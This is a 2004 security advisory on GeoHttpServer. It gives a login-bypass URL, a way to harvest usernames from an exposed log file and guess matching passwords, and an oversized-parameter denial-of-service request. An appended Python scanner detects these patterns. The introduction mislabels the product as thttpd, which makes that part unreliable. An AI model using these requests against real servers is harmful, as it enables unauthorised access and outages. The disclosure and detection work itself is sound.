GeoHttpServer Authentication Bypass Vulnerability & Denial Of Service Vulnerability
23 January 2004
From: "Rafel Ivgi, The-Insider" <theinsider(at)012.net.il>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: GeoHttpServer
Vendor: GEOVISION INC
http://www.geovision.com.tw
Versions: ALL
Platforms: Unix
Bug: Authentication Bypass Vulnerability & D.O.S (Denial Of Service)
Risk: High
Exploitation: Remote with browser
Date: 22 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with Unix systems such as FreeBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer security is pretty good. Some users, who understand what they are doing, configure the server to authenticate login attempts.

The server uses this authentication code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
<input type="id" name="id" size="10"><p></p>
Password:</BR>
<input type="password" name="pwd" size="10">
<p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
<input type="radio" name="ImageType" value="2">GIF</p>
<p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center>

</p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://<host>/%0a%0a bypasses it!
You get the GeoHttpServer default Main Page.
Now the main page leads to functions that also require authentication. In order to retrieve a user name we can go to http://<host>/logfile.txt, which generally contains the last logins and usernames.
In most cases the password will be the same as the user.
In addition there is an authentication form inside the server that requires a name and a password in order to see the server info/config.
Manipulating these links can cause a denial of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Another D.O.S caused by the server is an Internet Explorer D.O.S: when someone is watching a video stream from the server and presses the reconnect button, I.E has an overflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentication Bypass - http://<host>/%0a%0a bypasses it!
Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
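
The three request patterns described above (the encoded-newline path, the logfile.txt fetch, and the oversized sysinfo credential field) can be flagged in web access logs. This is an added detection example, not part of the original advisory or any vendor code; the Common Log Format input, the 64-character threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the login form's inputs are size="10", so legitimate values
# are short. 64 is an arbitrary cap chosen for this example.
MAX_FIELD_LEN = 64

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
ENCODED_CRLF_RE = re.compile(r"%0[ad]", re.IGNORECASE)

# Constructed sample lines (Common Log Format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2004:10:00:01 +0000] "GET / HTTP/1.0" 200 512',
    '198.51.100.7 - - [22/Jan/2004:10:00:05 +0000] "GET /%0a%0a HTTP/1.0" 200 2048',
    '198.51.100.7 - - [22/Jan/2004:10:00:09 +0000] "GET /logfile.txt HTTP/1.0" 200 900',
    '198.51.100.7 - - [22/Jan/2004:10:00:14 +0000] "GET /sysinfo?id=x&pwd='
    + "a" * 500 + ' HTTP/1.0" 200 0',
    '192.0.2.10 - - [22/Jan/2004:10:01:00 +0000] "GET /sysinfo?id=admin&pwd=secret HTTP/1.0" 200 300',
]

def classify(line):
    """Return the list of findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []  # no parseable request line, nothing to judge
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    findings = []
    # Encoded CR/LF in the path is the pattern that skipped the login page.
    if ENCODED_CRLF_RE.search(parts.path):
        findings.append("encoded CR/LF in path")
    # logfile.txt exposes recent logins and usernames.
    if path == "/logfile.txt":
        findings.append("logfile.txt requested")
    # Very long id/pwd values on sysinfo match the denial-of-service request.
    if path == "/sysinfo":
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in ("id", "pwd"):
            if any(len(v) > MAX_FIELD_LEN for v in params.get(name, [])):
                findings.append(f"oversized {name} parameter")
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for lines with any finding."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(n, ", ".join(findings))
```

The same three conditions can be used as deny rules on a reverse proxy placed in front of the server.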

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

